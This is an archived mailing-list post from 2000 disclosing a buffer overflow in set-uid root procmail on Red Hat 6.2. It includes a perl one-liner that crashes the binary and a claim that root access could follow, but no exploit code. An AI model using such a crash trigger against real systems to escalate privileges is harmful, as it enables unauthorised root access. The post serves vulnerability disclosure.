Vulnerability Development mailing list archives
Buffer overflow in procmail [suid!]
From: Tobias von Koch <tvk () WELTCHARTS DE>
Date: Thu, 10 Aug 2000 15:52:59 +0200
hi, I think I've found a buffer overflow in procmail from Redhat 6.2 (v3.14 1999/11/22, others not tested). Procmail is installed set-uid root and set-gid mail by default: -rwsr-sr-x 1 root mail 76432 Feb 7 2000 /usr/bin/procmail First try this: $ /usr/bin/procmail x=`perl -e "print 1x2053"` <Ctrl>-D /* Procmail waits for mail */ procmail: Exceeded LINEBUF Procmail recognizes that the line is a bit too long. alright. But if you try something bigger than 2053... $ /usr/bin/procmail x=`perl -e "print 1x2054"` <Ctrl>-D Segmentation fault You can get root privileges (with some code) now.... tobias
Current thread:
- Buffer overflow in procmail [suid!] Tobias von Koch (Aug 10)
- Re: Buffer overflow in procmail [suid!] Aaron Campbell (Aug 10)
- Re: Buffer overflow in procmail [suid!] Adam Prato (Aug 10)
- Re: Buffer overflow in procmail [suid!] rpc (Aug 10)
- Re: Buffer overflow in procmail [suid!] HD Moore (Aug 14)
- Re: Buffer overflow in procmail [suid!] Michal Zalewski (Aug 14)
- Re: Buffer overflow in procmail [suid!] Michal Zalewski (Aug 10)
- Re: Buffer overflow in procmail [suid!] Martin MOKREJŠ (Aug 14)
- Re: Buffer overflow in procmail [suid!] Aaron Campbell (Aug 10)